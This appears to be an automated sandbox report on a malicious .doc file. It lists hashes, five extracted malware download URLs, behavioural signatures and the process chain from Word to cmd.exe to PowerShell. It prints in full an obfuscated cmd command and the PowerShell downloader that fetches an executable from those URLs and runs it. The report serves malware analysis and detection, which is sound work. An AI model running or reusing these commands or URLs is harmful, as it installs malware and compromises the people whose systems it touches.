Analysis
-
max time kernel
125s -
max time network
143s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
04-12-2021 02:36
Static task
static1
Behavioral task
behavioral1
Sample
fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee.doc
Resource
win10-en-20211104
Behavioral task
behavioral2
Sample
fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee.doc
Resource
win10-en-20211014
General
-
Target
fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee.doc
-
Size
94KB
-
MD5
ecf475aea6d373c61244f4db7d2ee595
-
SHA1
8f20b0a73d536e74c3c55d1fa98d07ab98ef46b6
-
SHA256
fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee
-
SHA512
e2e9852a1de72e3e8d569842899c07f0be1d0305c75ac4bfa171ffda6d7d19298da492be2b11174ffe7ab29f379a592f68e30078dffadfdf414c94433bfac087
Malware Config
Extracted
http://cotton-world.net/as03M
http://mandram.com/2MouUZ
http://djteresa.net/RTKYqE
http://vkontekste.net/db20
http://art-nail.net/Y
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3704 2432 Cmd.exe WINWORD.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 34 844 powershell.exe 36 844 powershell.exe 38 844 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
Cmd.exepid process 3704 Cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2432 WINWORD.EXE 2432 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 844 powershell.exe 844 powershell.exe 844 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 844 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2432 WINWORD.EXE 2432 WINWORD.EXE 2432 WINWORD.EXE 2432 WINWORD.EXE 2432 WINWORD.EXE 2432 WINWORD.EXE 2432 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXECmd.exedescription pid process target process PID 2432 wrote to memory of 3704 2432 WINWORD.EXE Cmd.exe PID 2432 wrote to memory of 3704 2432 WINWORD.EXE Cmd.exe PID 3704 wrote to memory of 844 3704 Cmd.exe powershell.exe PID 3704 wrote to memory of 844 3704 Cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fa964842244e752950fd4ed711759382a8950e13cc2794d6f73ab7eb9169e5ee.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\Cmd.exeCmd /V/C"s^e^t 7^j=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}}{^hc^t^ac^};^kaerb;ldd$ m^e^t^I-^ekovnI^;)ldd$ ,^awS^$(e^l^i^F^da^o^lnw^o^D^.^a^T^z^${^yrt{)^jlw^$^ ni ^aw^S$(^hc^aerof;'exe^.^'^+hNF$^+^'\'+ci^l^b^up^:vne$^=l^dd$^;^'^0^1^6' = hN^F$;)'@'(^ti^lp^S.'Y/ten^.^li^an-^tra//:^ptth@^02b^d/t^en^.et^sk^etn^o^kv//:pt^t^h^@E^q^Y^KTR/t^en^.^a^s^eretj^d//:p^tth^@^Z^Uu^oM^2/^m^oc.mar^dnam//^:^p^tth@^M30^s^a/^t^en^.^dlr^o^w^-no^t^toc//^:p^t^t^h^'^=^j^lw$;^tnei^lCbe^W^.^t^eN tcejb^o^-w^en^=^a^T^z^$ ll^e^hsr^e^wop&&^f^or /^L %^b in (3^41^,-^1^,^0)d^o ^s^et K^W^a=!K^W^a!!7^j:~%^b,1!&&i^f %^b ^l^eq ^0 ca^l^l %K^W^a:^*^KW^a!^=%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $zTa=new-object Net.WebClient;$wlj='http://cotton-world.net/as03M@http://mandram.com/2MouUZ@http://djteresa.net/RTKYqE@http://vkontekste.net/db20@http://art-nail.net/Y'.Split('@');$FNh = '610';$ddl=$env:public+'\'+$FNh+'.exe';foreach($Swa in $wlj){try{$zTa.DownloadFile($Swa, $ddl);Invoke-Item $ddl;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/844-256-0x0000000000000000-mapping.dmp
-
memory/844-288-0x00000261DF556000-0x00000261DF558000-memory.dmpFilesize
8KB
-
memory/844-267-0x00000261DF553000-0x00000261DF555000-memory.dmpFilesize
8KB
-
memory/844-266-0x00000261DF550000-0x00000261DF552000-memory.dmpFilesize
8KB
-
memory/2432-119-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmpFilesize
64KB
-
memory/2432-121-0x000002A7964E0000-0x000002A7964E2000-memory.dmpFilesize
8KB
-
memory/2432-122-0x000002A7964E0000-0x000002A7964E2000-memory.dmpFilesize
8KB
-
memory/2432-123-0x000002A7964E0000-0x000002A7964E2000-memory.dmpFilesize
8KB
-
memory/2432-120-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmpFilesize
64KB
-
memory/2432-116-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmpFilesize
64KB
-
memory/2432-118-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmpFilesize
64KB
-
memory/2432-117-0x00007FFB887E0000-0x00007FFB887F0000-memory.dmpFilesize
64KB
-
memory/3704-254-0x0000000000000000-mapping.dmp